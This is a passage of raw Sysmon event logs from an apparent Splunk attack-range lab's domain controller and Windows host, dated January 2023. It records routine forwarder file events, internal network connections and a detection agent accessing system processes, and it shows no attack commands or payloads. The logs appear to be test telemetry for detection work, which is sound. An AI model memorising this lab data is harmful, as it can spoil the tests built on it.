Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAB3EC338465A8336B6CC3F6616F3F1F,SHA256=81BDF3391D6D0F7043F267831967C9FA97DFEF2B4BD75FF9045C56448D729FD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:44.432{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF1C691B44F85032956D49DEC675BD42,SHA256=F54860F3D8C3F4E777687D1749E3FF3AFD24A459B8AF11D0173B194D5079D07E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:44.114{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-041MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015908Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:45.732{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BD3DB2140E497FC1606B6B9CD135CD6,SHA256=4E5A4DA8DEC130161FC0346439AE666AEE2F7A5BF1A9A2041C064CEDB8983F2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:45.523{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4475D63A3DED8963F3C69BC0E583D534,SHA256=5D7D72AD4C3012B9615BA98BD66BD206F4182C555846F351B770CE58CCD66415,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:45.280{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08B235229DE621DBB2A1C7DB409BC537,SHA256=8EB61F850D9BAA703DEAFA8A4E9E4F9F66C6E127CBADAA043A01FE30393CC3B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015910Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:46.825{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C5EFE13C85C6C9B5E31A6D6FBB4863B,SHA256=8C8C8F3019A820A9CD3CAEE0BAA3B61EDC789C512813AEAD4962059DEAC443F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:46.595{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAB78E144B7D61DC30850D167C9FBC24,SHA256=95F38799CA93D7F90C83F6F8B14A06126789E41AF82FF977F333EEB5722C5658,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015909Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:43.970{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50069-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015911Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:47.910{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=462662F2B7EEFFE62D78D17D6EBB05E8,SHA256=C2509733D691475A4E75893D5CED8508144804B563B98778D1151744DBBCF8E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:47.672{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85175E1553C27134C0535ED5C6327B82,SHA256=5BBB5734DA04EDB630971240387B83AB315B66DFF51CDEB152F7BC746EE22089,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:48.753{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8A8E41BE21769C301DFB594A94827D0,SHA256=7A736B42DC4550938C72C5651B648EF8267914E53EE2C3EA29D64A2587AD8482,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:45.716{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56269-false10.0.1.12-8000- 23542300x800000000000000041152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:49.851{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6C31928B12856D56C2E8498BB1A9660,SHA256=760922E0B340F9BADCDE97EB8D9D9BD221292F33188F8D5F904B3E708E356797,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015912Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:49.000{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65B2C27D6E32C26D410682564C86F54D,SHA256=DA3FEC5D5BEAB52190FC9C05F52E303AB0DC09F89AB0E92773140D9901CEAF89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:50.945{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FC090D177061B0BEDB3C5EB811BBB43,SHA256=A4DBC886F7793D2786628AA9E646AA3B2ABFB99FF9BCADACFF20E033D2EDC52B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015914Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:49.083{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50070-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015913Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:50.091{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EA58EFCA7626CDCDDF64198C19B46EE,SHA256=621F036740903EEAAD449AC731792657E9647E11A3A23D3609B64B2454F4DFAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015915Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:51.186{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC58856A40F9A0A1FCA83583510A6FB4,SHA256=CE7A19CB69C1C73BDF55FA861F7DB35486F8C5B1C00A237C0E3E913E39CB6C1E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041180Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.903{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041179Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.901{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041178Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.896{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.892{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.881{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.874{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.867{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000041171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.863{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=0EF1E14D462A19CC02230EF736506FC7,SHA256=C847EFB3ECE39F61C6DBD21E18BD3886174089EC4C5AFC370A8BDA32F64AF8DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.863{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000041169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.863{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_BJ0Crr7PNEz8clCMD5=F2326463FB9849F2710FBB35984E2A19,SHA256=FAA0D1BF65B649A3209F8958C993D37A2487CB91E7BF37B719F1347D3187E02F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.861{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000041167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.853{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=AC6D85E1964B369E1090FFB407AD4630,SHA256=A5194CD8F7C556CEF41451667843FECDCD6496D81D73848DC3C05D37402C99D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.831{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.815{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.809{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:51.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program 